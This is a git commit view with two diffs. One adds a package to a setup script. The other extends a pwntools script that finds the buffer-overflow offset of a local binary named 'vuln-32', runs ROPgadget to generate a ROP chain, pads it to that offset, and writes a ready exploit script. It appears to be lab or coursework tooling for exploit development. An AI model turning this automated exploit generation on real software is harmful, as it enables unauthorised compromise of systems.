Run ROPGadget with auto offset

Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com>
Co-authored-by: jack bond-preston <jackbondpreston@outlook.com>
This commit is contained in:
Liam Dalgarno 2020-11-25 15:38:08 +00:00
parent a8cbc66faf
commit 688bb5a1be
2 changed files with 31 additions and 13 deletions

View File

@ -9,6 +9,7 @@ sudo apt-get --quiet --assume-yes install gcc-multilib
sudo apt-get --quiet --assume-yes install zsh sudo apt-get --quiet --assume-yes install zsh
sudo apt-get --assume-yes --quiet install python3 python3-pip python3-dev git libssl-dev libffi-dev sudo apt-get --assume-yes --quiet install python3 python3-pip python3-dev git libssl-dev libffi-dev
sudo apt-get --assume-yes --quiet install python
python3 -m pip install --upgrade pip python3 -m pip install --upgrade pip
python3 -m pip install --upgrade pwntools python3 -m pip install --upgrade pwntools

View File

@ -2,11 +2,15 @@ from pwnlib.elf.corefile import Coredump
from pwnlib.util.cyclic import cyclic, cyclic_find from pwnlib.util.cyclic import cyclic, cyclic_find
from pwnlib.util.packing import pack from pwnlib.util.packing import pack
from pwnlib.tubes.process import process from pwnlib.tubes.process import process
import os
import os
import subprocess
exec_name = "./vuln-32"
def find_offset(exec_name):
# TODO: command line arguments # TODO: command line arguments
input_file = "input.txt" input_file = "input.txt"
exec_name = "./vuln-32"
core_file = "./core" core_file = "./core"
os.remove(core_file) os.remove(core_file)
@ -22,6 +26,19 @@ core = Coredump('./core')
assert pack(core.eip) in payload assert pack(core.eip) in payload
print(cyclic_find(core.eip))
os.remove(input_file) os.remove(input_file)
return cyclic_find(core.eip)
offset = find_offset(exec_name)
# print("\t# Padding goes here") <-- search for this
# print("\tp = ''\n")
result = subprocess.run(["ROPgadget", "--binary", exec_name, "--ropchain"], stdout=subprocess.PIPE)
stdout = result.stdout
stdout = stdout.replace(b"p = ''\n", b"p = \"" + bytes('a' * offset, 'ascii') + b"\"\n")
with open("test.py", "wb") as f:
f.write(stdout)